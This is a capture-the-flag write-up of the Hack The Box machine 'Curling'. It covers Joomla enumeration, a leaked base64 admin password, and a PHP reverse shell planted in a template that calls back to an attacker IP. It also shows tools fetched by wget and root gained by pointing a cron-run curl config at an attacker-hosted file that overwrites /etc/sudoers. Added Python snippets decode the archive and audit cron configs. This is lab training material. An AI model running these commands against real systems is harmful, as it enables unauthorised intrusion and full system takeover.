Curling
Ports scan
u505@kali:~/HTB/Machines/Curling$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.150 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-02-14 14:51:53 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.150
Discovered open port 80/tcp on 10.10.10.150
u505@kali:~/HTB/Machines/Curling$ nmap -sC -sV 10.10.10.150
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-14 09:52 EST
Nmap scan report for curling.htb (10.10.10.150)
Host is up (0.039s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.90 seconds
Port 80
The web site runs the Joomla! CMS.
Joomla! Enumeration
The Joomla! scan does not reveal anything very interesting except the exact Joomla! version.
u505@kali:~/HTB/Machines/Curling$ joomscan -ec -u http://10.10.10.150
    (1337.today)

    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://10.10.10.150 ...
[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.8.8

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://10.10.10.150/administrator/components
http://10.10.10.150/administrator/modules
http://10.10.10.150/administrator/templates
http://10.10.10.150/images/banners

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://10.10.10.150/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found

[+] Enumeration component (com_ajax)
[++] Name: com_ajax
Location : http://10.10.10.150/components/com_ajax/
Directory listing is enabled : http://10.10.10.150/components/com_ajax/

[+] Enumeration component (com_banners)
[++] Name: com_banners
Location : http://10.10.10.150/components/com_banners/
Directory listing is enabled : http://10.10.10.150/components/com_banners/

[+] Enumeration component (com_contact)
[++] Name: com_contact
Location : http://10.10.10.150/components/com_contact/
Directory listing is enabled : http://10.10.10.150/components/com_contact/

[+] Enumeration component (com_content)
[++] Name: com_content
Location : http://10.10.10.150/components/com_content/
Directory listing is enabled : http://10.10.10.150/components/com_content/

[+] Enumeration component (com_contenthistory)
[++] Name: com_contenthistory
Location : http://10.10.10.150/components/com_contenthistory/
Directory listing is enabled : http://10.10.10.150/components/com_contenthistory/

[+] Enumeration component (com_fields)
[++] Name: com_fields
Location : http://10.10.10.150/components/com_fields/
Directory listing is enabled : http://10.10.10.150/components/com_fields/

[+] Enumeration component (com_finder)
[++] Name: com_finder
Location : http://10.10.10.150/components/com_finder/
Directory listing is enabled : http://10.10.10.150/components/com_finder/

[+] Enumeration component (com_mailto)
[++] Name: com_mailto
Location : http://10.10.10.150/components/com_mailto/
Directory listing is enabled : http://10.10.10.150/components/com_mailto/
Installed version : 3.1

[+] Enumeration component (com_media)
[++] Name: com_media
Location : http://10.10.10.150/components/com_media/
Directory listing is enabled : http://10.10.10.150/components/com_media/

[+] Enumeration component (com_newsfeeds)
[++] Name: com_newsfeeds
Location : http://10.10.10.150/components/com_newsfeeds/
Directory listing is enabled : http://10.10.10.150/components/com_newsfeeds/

[+] Enumeration component (com_search)
[++] Name: com_search
Location : http://10.10.10.150/components/com_search/
Directory listing is enabled : http://10.10.10.150/components/com_search/

[+] Enumeration component (com_users)
[++] Name: com_users
Location : http://10.10.10.150/components/com_users/
Directory listing is enabled : http://10.10.10.150/components/com_users/

[+] Enumeration component (com_wrapper)
[++] Name: com_wrapper
Location : http://10.10.10.150/components/com_wrapper/
Directory listing is enabled : http://10.10.10.150/components/com_wrapper/
Installed version : 3.1

Your Report : reports/10.10.10.150/
Web Enumeration
u505@kali:~/HTB/Machines/Curling$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -r -e "txt,php" -f -t 50 -u http://10.10.10.150 --plain-text-report=dirsearch.txt

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )

Extensions: txt, php | HTTP method: get | Threads: 50 | Wordlist size: 13832 | Recursion level: 1

Error Log: /opt/utils/dirsearch/logs/errors-20-02-14_10-06-26.log

Target: http://10.10.10.150

[10:06:26] Starting:
[10:06:30] 403 -  300B - /.htpasswd.txt
[10:06:30] 403 -  300B - /.htpasswd.php
[10:06:30] 403 -  291B - /.php
[10:06:30] 200 -    5KB - /administrator/
[10:06:34] 200 -   31B - /bin/
[10:06:35] 200 -   31B - /cache/
[10:06:37] 200 -   31B - /components/
[10:06:38] 200 -    0B - /configuration.php
[10:06:48] 403 -  293B - /icons/
[10:06:48] 200 -   31B - /images/
[10:06:48] 200 -   31B - /includes/
[10:06:48] 200 -   14KB - /index.php
[10:06:48] 200 -   14KB - /index.php/
[10:06:51] 200 -   31B - /language/
[10:06:51] 200 -   31B - /layouts/
[10:06:51] 200 -   31B - /libraries/
[10:06:51] 200 -   18KB - /LICENSE.txt
[10:06:53] 200 -   31B - /media/
[10:06:54] 200 -   31B - /modules/
[10:06:59] 200 -   31B - /plugins/
[10:07:02] 200 -    5KB - /README.txt
[10:07:05] 200 -   17B - /secret.txt
[10:07:05] 403 -  301B - /server-status/
[10:07:10] 200 -   31B - /templates/
[10:07:11] 200 -   31B - /tmp/
[10:07:14] 200 -    2KB - /web.config.txt
[10:07:16] Starting: administrator/
[10:07:17] 403 -  314B - /administrator/.htpasswd.php
[10:07:17] 403 -  314B - /administrator/.htpasswd.txt
[10:07:17] 403 -  305B - /administrator/.php
[10:07:24] 200 -   31B - /administrator/cache/
[10:07:27] 200 -    7KB - /administrator/components/
[10:07:36] 200 -    1KB - /administrator/help/
[10:07:38] 200 -    2KB - /administrator/includes/
[10:07:38] 200 -    5KB - /administrator/index.php
[10:07:38] 200 -    5KB - /administrator/index.php/
[10:07:40] 200 -    1KB - /administrator/language/
[10:07:41] 200 -   31B - /administrator/logs/
[10:07:44] 200 -    4KB - /administrator/modules/
[10:07:59] 200 -    1KB - /administrator/templates/
[10:08:04] Starting: bin/
[10:08:04] 403 -  295B - /bin/.php
[10:08:04] 403 -  304B - /bin/.htpasswd.txt
[10:08:04] 403 -  304B - /bin/.htpasswd.php
[10:08:53] Starting: cache/
[10:08:53] 403 -  297B - /cache/.php
[10:08:54] 403 -  306B - /cache/.htpasswd.php
[10:08:54] 403 -  306B - /cache/.htpasswd.txt
[10:09:42] Starting: components/
[10:09:43] 403 -  302B - /components/.php
[10:09:43] 403 -  311B - /components/.htpasswd.php
[10:09:43] 403 -  311B - /components/.htpasswd.txt
[10:10:30] Starting: icons/
[10:10:30] 403 -  297B - /icons/.php
[10:10:30] 403 -  306B - /icons/.htpasswd.txt
[10:10:31] 403 -  306B - /icons/.htpasswd.php
[10:11:10] 403 -  299B - /icons/small/
[10:11:22] Starting: images/
[10:11:22] 403 -  298B - /images/.php
[10:11:22] 403 -  307B - /images/.htpasswd.txt
[10:11:23] 403 -  307B - /images/.htpasswd.php
[10:11:29] 200 -    2KB - /images/banners/
[10:11:42] 200 -    2KB - /images/headers/
[10:12:10] Starting: includes/
[10:12:11] 403 -  309B - /includes/.htpasswd.php
[10:12:11] 403 -  300B - /includes/.php
[10:12:11] 403 -  309B - /includes/.htpasswd.txt
[10:12:29] 200 -    0B - /includes/framework.php
[10:12:59] Starting: index.php/
[10:13:13] 200 -    9KB - /index.php/01.php
[10:13:13] 200 -   10KB - /index.php/03.txt
[10:13:13] 200 -   10KB - /index.php/02.txt
[10:13:14] 200 -   10KB - /index.php/02/
[10:13:14] 200 -    9KB - /index.php/01.txt
[10:13:14] 200 -    9KB - /index.php/01/
[10:13:14] 200 -   14KB - /index.php/0/
[10:13:15] 200 -   10KB - /index.php/03/
[10:13:15] 200 -   10KB - /index.php/02.php
[10:13:15] 200 -    9KB - /index.php/1.txt
[10:13:16] 200 -    9KB - /index.php/1.php
[10:13:16] 200 -    9KB - /index.php/1/
[10:13:18] 200 -   10KB - /index.php/2.php
[10:13:18] 200 -   10KB - /index.php/2/
[10:13:18] 200 -    9KB - /index.php/1x1/
[10:13:18] 200 -   10KB - /index.php/2.txt
[10:13:19] 200 -    9KB - /index.php/1x1.txt
[10:13:20] 200 -    9KB - /index.php/1x1.php
[10:13:22] 200 -   10KB - /index.php/3.php
[10:13:22] 200 -   10KB - /index.php/3.txt
[10:13:22] 200 -   10KB - /index.php/2g/
[10:13:23] 200 -   10KB - /index.php/3g.txt
[10:13:23] 200 -   10KB - /index.php/2g.php
[10:13:23] 200 -   10KB - /index.php/3g/
[10:13:23] 200 -   10KB - /index.php/3rdparty.txt
[10:13:23] 200 -   10KB - /index.php/3rdparty/
[10:13:23] 200 -   10KB - /index.php/3/
[10:13:23] 200 -   10KB - /index.php/2g.txt
[10:13:24] 200 -   10KB - /index.php/03.php
[10:13:24] 200 -   10KB - /index.php/3rdparty.php
[10:13:26] 200 -   10KB - /index.php/3g.php
[10:17:12] 200 -   14KB - /index.php/home/
[10:17:13] 200 -   14KB - /index.php/Home/
[10:17:34] 200 -   14KB - /index.php/index.php/
[10:17:38] 200 -   14KB - /index.php/index.php
[10:23:30] Starting: language/
[10:23:31] 403 -  300B - /language/.php
[10:23:31] 403 -  309B - /language/.htpasswd.php
[10:23:31] 403 -  309B - /language/.htpasswd.txt
[10:24:20] Starting: layouts/
[10:24:21] 403 -  299B - /layouts/.php
[10:24:21] 403 -  308B - /layouts/.htpasswd.php
[10:24:21] 403 -  308B - /layouts/.htpasswd.txt
[10:24:44] 200 -    4KB - /layouts/joomla/
[10:24:45] 200 -  959B - /layouts/libraries/
[10:24:52] 200 -    1KB - /layouts/plugins/
[10:25:07] Starting: libraries/
[10:25:08] 403 -  301B - /libraries/.php
[10:25:08] 403 -  310B - /libraries/.htpasswd.php
[10:25:08] 403 -  310B - /libraries/.htpasswd.txt
[10:25:17] 200 -    0B - /libraries/cms.php
[10:25:17] 200 -    1KB - /libraries/cms/
[10:25:27] 200 -    0B - /libraries/import.php
[10:25:29] 200 -    6KB - /libraries/joomla/
[10:25:30] 200 -    3KB - /libraries/legacy/
[10:25:30] 200 -    0B - /libraries/loader.php
[10:25:46] 200 -   11KB - /libraries/src/
[10:25:51] 200 -    3KB - /libraries/vendor/
[10:25:54] Starting: media/
[10:25:54] 403 -  297B - /media/.php
[10:25:54] 403 -  306B - /media/.htpasswd.php
[10:25:54] 403 -  306B - /media/.htpasswd.txt
[10:26:04] 200 -  941B - /media/cms/
[10:26:05] 200 -  957B - /media/contacts/
[10:26:09] 200 -    1KB - /media/editors/
[10:26:19] 200 -  953B - /media/mailto/
[10:26:20] 200 -    1KB - /media/media/
[10:26:35] 200 -    1KB - /media/system/
[10:26:42] Starting: modules/
[10:26:42] 403 -  308B - /modules/.htpasswd.php
[10:26:42] 403 -  299B - /modules/.php
[10:26:42] 403 -  308B - /modules/.htpasswd.txt
[10:27:31] Starting: plugins/
[10:27:32] 403 -  308B - /plugins/.htpasswd.txt
[10:27:32] 403 -  308B - /plugins/.htpasswd.php
[10:27:32] 403 -  299B - /plugins/.php
[10:27:37] 200 -    2KB - /plugins/authentication/
[10:27:40] 200 -  967B - /plugins/captcha/
[10:27:43] 200 -    2KB - /plugins/content/
[10:27:46] 200 -    1KB - /plugins/editors/
[10:27:48] 200 -  965B - /plugins/extension/
[10:27:49] 200 -    4KB - /plugins/fields/
[10:27:53] 200 -    1KB - /plugins/installer/
[10:28:09] 200 -    2KB - /plugins/search/
[10:28:14] 200 -    4KB - /plugins/system/
[10:28:17] 200 -    1KB - /plugins/user/
[10:28:20] Starting: server-status/
[10:29:18] Starting: templates/
[10:29:19] 403 -  310B - /templates/.htpasswd.txt
[10:29:19] 403 -  310B - /templates/.htpasswd.php
[10:29:19] 403 -  301B - /templates/.php
[10:30:00] 200 -    0B - /templates/system/
[10:30:05] Starting: tmp/
[10:30:06] 403 -  304B - /tmp/.htpasswd.txt
[10:30:06] 403 -  295B - /tmp/.php
[10:30:06] 403 -  304B - /tmp/.htpasswd.php

Task Completed
secret.txt
u505@kali:~/HTB/Machines/Curling$ curl http://curling/secret.txt
Q3VybGluZzIwMTgh
u505@kali:~/HTB/Machines/Curling$ echo -n "Q3VybGluZzIwMTgh" | base64 -d
Curling2018!

The file provides a password :)
Post with username
In a post, there is a username: floris.
Access to Joomla! administration console
With the username and the password, we have access to the Joomla! administration console.
User flag
Reverse shell
We can obtain a reverse shell by modifying the template source code.

u505@kali:~/HTB/Machines/Curling$ cp /usr/share/webshells/php/php-reverse-shell.php ./
u505@kali:~/HTB/Machines/Curling$ vi php-reverse-shell.php
u505@kali:~/HTB/Machines/Curling$ cat php-reverse-shell.php | grep CHANGE
$ip = '10.10.14.26';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
We start the listener:

u505@kali:~/HTB/Machines/Curling$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Copy and paste the PHP reverse shell code into the template's index.php and click on Template preview (you do not need to save the file, which avoids spoiling it for other users :)

And the reverse shell is spawned.

u505@kali:~/HTB/Machines/Curling$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.150.
Ncat: Connection from 10.10.10.150:50396.
Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 16:13:31 up  1:30,  0 users,  load average: 0.00, 0.01, 0.95
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 1: python: not found
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@curling:/$ stty raw -echo
stty raw -echo
Obtain user password (Lateral escalation)
www-data@curling:/$ cd /home/floris
www-data@curling:/home/floris$ ls -l
total 12
drwxr-x--- 2 root   floris 4096 May 22  2018 admin-area
-rw-r--r-- 1 floris floris 1076 May 22  2018 password_backup
-rw-r----- 1 floris floris   33 May 22  2018 user.txt

We cannot read the user flag, but there is a readable file, password_backup.
www-data@curling:/home/floris$ cat password_backup
00000000: 425a 6839 3141 5926 5359 819b bb48 0000  BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34  ....A...P)ava.:4
00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960  N...n.T.#.@%...`
00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000   ......z.@......
00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800  ..i.4hdi...9.h..
00000050: 000f 51a0 0064 681a 069e a190 0000 0034  ..Q..dh........4
00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0  i...5.n......J..
00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78  .h...*..}y..<~.x
00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931  .>...sVT.zH....1
00000090: c856 921b 1221 3385 6046 a2dd c173 0d22  .V...!3.`F...s."
000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290  ..n....7j:X.d.R.
000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503  .k./... ....)p..
000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843  7..;.....9...P.C
000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c  .Y.P...HB....*..
000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090  .G.. .U@r..rE8P.
000000f0: 819b bb48                                ...H

The file is an xxd hex dump; we reconstruct the original file from it (columns 11-49 hold the hex bytes) and then peel off the nested compression layers, checking the type with file at each step.

www-data@curling:/home/floris$ cat password_backup | cut -c 11-49 > /tmp/password_backup.hex
www-data@curling:/home/floris$ cat /tmp/password_backup.hex | xxd -r -p > /tmp/password_backup.bin
www-data@curling:/home/floris$ file /tmp/password_backup.bin
/tmp/password_backup.bin: bzip2 compressed data, block size = 900k
www-data@curling:/home/floris$ cp /tmp/password_backup.bin /tmp/password_backup.bz2
www-data@curling:/home/floris$ cd /tmp
www-data@curling:/tmp$ bzip2 -d password_backup.bz2
www-data@curling:/tmp$ file password_backup
password_backup: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix
www-data@curling:/tmp$ mv password_backup password.gz
www-data@curling:/tmp$ gunzip password.gz
www-data@curling:/tmp$ file password
password: bzip2 compressed data, block size = 900k
www-data@curling:/tmp$ mv password password.bz2
www-data@curling:/tmp$ bzip2 -d password.bz2
www-data@curling:/tmp$ file password
password: POSIX tar archive (GNU)
www-data@curling:/tmp$ mv password password.tar
www-data@curling:/tmp$ tar xvf password.tar
password.txt
www-data@curling:/tmp$ cat password.txt
5d<wdCbdZu)|hChXll
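The manual cut / xxd -r / file / bzip2 / gunzip / tar sequence above generalises to a small decoder that parses an xxd dump and unwraps layers by their magic bytes until plain data remains. This is an added example, not part of the write-up; it builds its own constructed sample archive (tar inside bzip2 inside gzip inside bzip2, the same nesting as on the box) rather than using the real password_backup.

```python
import bz2
import gzip
import io
import re
import tarfile

HEX_TOKEN = re.compile(r"[0-9a-fA-F]{2}|[0-9a-fA-F]{4}")


def xxd_to_bytes(dump: str) -> bytes:
    """Like `cut -c 11-49 | xxd -r -p`: keep only the hex column of each line."""
    out = bytearray()
    for line in dump.splitlines():
        offset, sep, rest = line.partition(":")
        if not sep or not re.fullmatch(r"[0-9a-fA-F]{1,8}", offset.strip()):
            continue  # shell prompt, command echo or other non-dump line
        for tok in rest.split()[:8]:  # default xxd width: 16 bytes per line
            if not HEX_TOKEN.fullmatch(tok):
                break  # reached the ASCII column
            out += bytes.fromhex(tok)
    return bytes(out)


def peel_layers(blob: bytes):
    """Unwrap bzip2/gzip/tar layers by magic bytes; returns (layer names, payload)."""
    layers = []
    while True:
        if blob.startswith(b"BZh"):
            layers.append("bzip2")
            blob = bz2.decompress(blob)
        elif blob.startswith(b"\x1f\x8b"):
            layers.append("gzip")
            blob = gzip.decompress(blob)
        elif len(blob) > 262 and blob[257:262] == b"ustar":
            layers.append("tar")
            with tarfile.open(fileobj=io.BytesIO(blob), mode="r:") as tar:
                first = next(m for m in tar.getmembers() if m.isfile())
                blob = tar.extractfile(first).read()
        else:
            return layers, blob


def bytes_to_xxd(data: bytes) -> str:
    """Render bytes in xxd's default layout (only used to build the sample)."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        hexcol = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {hexcol:<39}  {text}")
    return "\n".join(lines)


def build_sample_dump() -> str:
    """Constructed sample (not the real file): tar(password.txt)->bz2->gzip->bz2."""
    secret = b"constructed-sample-password\n"
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo("password.txt")
        info.size = len(secret)
        tar.addfile(info, io.BytesIO(secret))
    return bytes_to_xxd(bz2.compress(gzip.compress(bz2.compress(buf.getvalue()))))
```

Feeding the real dump to xxd_to_bytes and then peel_layers reproduces the four manual steps in one call; each layer is recognised from its first bytes, the same information file reports.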
Login with floris
u505@kali:~/HTB/Machines/Curling$ ssh floris@curling
The authenticity of host 'curling (10.10.10.150)' can't be established.
ECDSA key fingerprint is SHA256:o1Cqn+GlxiPRiKhany4ZMStLp3t9ePE9GjscsUsEjWM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'curling,10.10.10.150' (ECDSA) to the list of known hosts.
floris@curling's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-22-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Feb 14 16:38:15 UTC 2020

  System load:  0.01              Processes:            181
  Usage of /:   46.8% of 9.78GB   Users logged in:      1
  Memory usage: 27%               IP address for ens33: 10.10.10.150
  Swap usage:   0%

0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Fri Feb 14 16:35:23 2020 from 10.10.14.25
floris@curling:~$ cat user.txt
<USER_FLAG>
Escalation of privileges
Tools upload
u505@kali:~/HTB/Machines/Curling$ mkdir www
u505@kali:~/HTB/Machines/Curling$ cd www/
u505@kali:~/HTB/Machines/Curling/www$ cp /opt/utils/pspy/pspy64 ./
u505@kali:~/HTB/Machines/Curling/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/Curling/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...

From the target machine:

floris@curling:~$ wget -q http://10.10.14.26/pspy64
floris@curling:~$ wget -q http://10.10.14.26/LinEnum.sh
floris@curling:~$ chmod +x pspy64 LinEnum.sh
Cron job
pspy reveals a cron job running as root (UID=0):

2020/02/14 16:56:01 CMD: UID=0    PID=6814   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/02/14 16:56:01 CMD: UID=0    PID=6813   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/02/14 16:56:01 CMD: UID=0    PID=6812   | sleep 1
2020/02/14 16:56:01 CMD: UID=0    PID=6811   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input

The curl process reads its configuration from the file /home/floris/admin-area/input and executes it.
u505@kali:~/HTB/Machines/Curling$ curl --help
...
 -K, --config <file>  Read config from a file
...
     --url <url>      URL to work with
...
 -o, --output <file>  Write to file instead of stdout

The user floris can write the file input, so we can manipulate the instructions in it.

floris@curling:~/admin-area$ ls -ltr
total 20
-rw-rw---- 1 root floris 14236 Feb 14 19:18 report
-rw-rw---- 1 root floris    25 Feb 14 19:18 input
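The root cause here is a root cron job that takes its curl configuration from a file a non-root user can modify. The audit below, an added example rather than anything from the write-up, parses crontab -l style entries, pulls out every -K/--config argument and flags files that are missing, group- or world-writable, or not owned by the trusted uid; the crontab text and the temp-dir files it checks are constructed to mirror the admin-area layout above (input is -rw-rw----).

```python
import os
import shlex
import stat
import tempfile


def config_paths(command: str):
    """Yield the file arguments curl reads via -K/--config in one cron command."""
    tokens = shlex.split(command)  # the command may chain programs with ';'
    for i, tok in enumerate(tokens):
        if tok in ("-K", "--config") and i + 1 < len(tokens):
            yield tokens[i + 1]
        elif tok.startswith("--config="):
            yield tok.split("=", 1)[1]


def file_risks(path: str, trusted_uid: int):
    """Reasons an untrusted user could change what root's curl will read."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["missing: whoever can create it controls the config"]
    reasons = []
    if st.st_uid != trusted_uid:
        reasons.append(f"owned by uid {st.st_uid}, not {trusted_uid}")
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_crontab(crontab_text: str, trusted_uid: int = 0):
    """Return [(config path, reasons)] for tamperable curl configs in a user crontab."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # comment or VAR=value line
        fields = line.split(None, 5)  # 5 schedule fields + the command
        if len(fields) < 6:
            continue
        for path in config_paths(fields[5]):
            reasons = file_risks(path, trusted_uid)
            if reasons:
                findings.append((path, reasons))
    return findings


def demo():
    """Constructed sample: the admin-area layout rebuilt in a temp dir."""
    d = tempfile.mkdtemp()
    bad, good = os.path.join(d, "input"), os.path.join(d, "safe.cfg")
    for p, mode in ((bad, 0o660), (good, 0o640)):  # input mimics -rw-rw----
        with open(p, "w") as f:
            f.write('url = "http://example.invalid/"\n')
        os.chmod(p, mode)
    crontab = (f"* * * * * curl -K {bad} -o {d}/report\n"
               f"* * * * * sleep 1; cat /root/default.txt > {bad}\n"
               f"* * * * * curl --config {good} -o {d}/report2\n")
    # The sample cron 'runs' as the current user, so that uid is the trusted one.
    return audit_crontab(crontab, trusted_uid=os.getuid())
```

Run against the real root crontab (with trusted_uid=0) it reports /home/floris/admin-area/input as group-writable; the fix is to keep the config under a root-only directory or drop the group write bit.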
Modify behavior of curl
We create a file in the web root on our machine:

u505@kali:~/HTB/Machines/Curling/www$ vi sudo.txt
u505@kali:~/HTB/Machines/Curling/www$ cat sudo.txt
root ALL=(ALL:ALL) ALL
floris ALL=(ALL) NOPASSWD:ALL
We modify the input file:

floris@curling:~/admin-area$ vi input
floris@curling:~/admin-area$ cat input
url = "http://10.10.14.26/sudo.txt"
output = /etc/sudoers
Root Flag
Once the cron job has run, we can sudo to root.
floris@curling:~/admin-area$ sudo -i
root@curling:~# whoami
root
root@curling:~# cat /root/root.txt
<ROOT_FLAG>
root@curling:~# crontab -l | grep -v "^#"
* * * * * curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
* * * * * sleep 1; cat /root/default.txt > /home/floris/admin-area/input
References
Daniel Simao 06:46, 14 February 2020 (EST)